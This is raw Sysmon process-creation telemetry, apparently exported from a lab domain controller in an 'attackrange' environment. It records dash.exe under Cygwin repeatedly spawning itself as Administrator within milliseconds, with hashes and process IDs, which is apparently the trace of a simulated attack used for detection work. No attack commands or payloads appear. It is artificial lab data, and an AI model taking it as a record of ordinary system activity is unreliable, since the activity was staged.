14:55:57.719{A8622C2F-53FD-6078-720A-00000000AE01}6076C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052483Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.711{A8622C2F-53FD-6078-710A-00000000AE01}3176C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052471Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.702{A8622C2F-53FD-6078-700A-00000000AE01}6440C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052459Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.694{A8622C2F-53FD-6078-6F0A-00000000AE01}5800C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052447Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.686{A8622C2F-53FD-6078-6E0A-00000000AE01}3136C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052435Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.676{A8622C2F-53FD-6078-6D0A-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052423Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.668{A8622C2F-53FD-6078-6C0A-00000000AE01}6084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052411Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.659{A8622C2F-53FD-6078-6B0A-00000000AE01}5852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052399Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.651{A8622C2F-53FD-6078-6A0A-00000000AE01}6652C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052387Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.643{A8622C2F-53FD-6078-690A-00000000AE01}4696C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052375Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.635{A8622C2F-53FD-6078-680A-00000000AE01}1844C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052363Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.627{A8622C2F-53FD-6078-670A-00000000AE01}5996C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052351Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.619{A8622C2F-53FD-6078-660A-00000000AE01}5620C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052339Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.611{A8622C2F-53FD-6078-650A-00000000AE01}5332C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.602{A8622C2F-53FD-6078-640A-00000000AE01}5964C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052315Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.595{A8622C2F-53FD-6078-630A-00000000AE01}3912C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052303Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.587{A8622C2F-53FD-6078-620A-00000000AE01}6240C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052291Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.579{A8622C2F-53FD-6078-610A-00000000AE01}924C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052279Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.571{A8622C2F-53FD-6078-600A-00000000AE01}5220C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052267Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.562{A8622C2F-53FD-6078-5F0A-00000000AE01}4300C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052255Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.554{A8622C2F-53FD-6078-5E0A-00000000AE01}5404C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052243Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.547{A8622C2F-53FD-6078-5D0A-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052231Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.539{A8622C2F-53FD-6078-5C0A-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052219Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.531{A8622C2F-53FD-6078-5B0A-00000000AE01}5804C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052207Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.523{A8622C2F-53FD-6078-5A0A-00000000AE01}5116C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052195Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.515{A8622C2F-53FD-6078-590A-00000000AE01}6364C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052183Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.507{A8622C2F-53FD-6078-580A-00000000AE01}1408C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052171Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.499{A8622C2F-53FD-6078-570A-00000000AE01}6808C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052157Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.491{A8622C2F-53FD-6078-560A-00000000AE01}3200C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052145Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.483{A8622C2F-53FD-6078-550A-00000000AE01}616C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052133Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.475{A8622C2F-53FD-6078-540A-00000000AE01}4832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052121Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.467{A8622C2F-53FD-6078-530A-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052109Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.459{A8622C2F-53FD-6078-520A-00000000AE01}2508C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052097Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.451{A8622C2F-53FD-6078-510A-00000000AE01}4604C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052085Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.443{A8622C2F-53FD-6078-500A-00000000AE01}5144C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052073Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.436{A8622C2F-53FD-6078-4F0A-00000000AE01}1628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052061Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.428{A8622C2F-53FD-6078-4E0A-00000000AE01}4788C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052049Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.420{A8622C2F-53FD-6078-4D0A-00000000AE01}5412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052037Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.412{A8622C2F-53FD-6078-4C0A-00000000AE01}6336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052025Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.404{A8622C2F-53FD-6078-4B0A-00000000AE01}6196C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052013Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.396{A8622C2F-53FD-6078-4A0A-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052001Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.388{A8622C2F-53FD-6078-490A-00000000AE01}6076C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051989Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 